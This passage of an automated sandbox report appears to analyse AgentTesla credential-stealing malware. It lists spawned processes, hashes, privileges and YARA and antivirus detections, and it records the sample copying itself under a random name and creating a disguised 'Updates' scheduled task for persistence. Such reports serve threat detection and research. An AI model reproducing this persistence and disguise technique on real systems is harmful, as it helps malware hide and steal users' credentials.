                            Start date:25/07/2024
                            Path:C:\Users\user\Desktop\LisectAVT_2403002A_16.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                            Imagebase:0xa40000
                            File size:685'063 bytes
                            MD5 hash:2C10CB6C2E23B7712EBF4042D669CD09
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.2898350883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2901886951.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2901886951.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:false

                            Target ID:10
                            Start time:17:35:20
                            Start date:25/07/2024
                            Path:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                            Imagebase:0xdf0000
                            File size:685'063 bytes
                            MD5 hash:2C10CB6C2E23B7712EBF4042D669CD09
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1787617220.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            Reputation:low
                            Has exited:true

                            Target ID:11
                            Start time:17:35:23
                            Start date:25/07/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff693ab0000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:12
                            Start time:17:35:26
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp"
                            Imagebase:0x6a0000
                            File size:187'904 bytes
                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:13
                            Start time:17:35:26
                            Start date:25/07/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:14
                            Start time:17:35:26
                            Start date:25/07/2024
                            Path:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                            Imagebase:0x60000
                            File size:685'063 bytes
                            MD5 hash:2C10CB6C2E23B7712EBF4042D669CD09
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:15
                            Start time:17:35:26
                            Start date:25/07/2024
                            Path:C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                            Imagebase:0x820000
                            File size:685'063 bytes
                            MD5 hash:2C10CB6C2E23B7712EBF4042D669CD09
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2902484873.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2902484873.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:false

                            No disassembly